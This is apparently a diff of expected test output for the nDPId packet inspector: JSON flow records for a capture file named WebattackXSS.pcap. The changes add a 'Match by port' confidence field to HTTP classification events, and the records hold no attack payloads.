-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
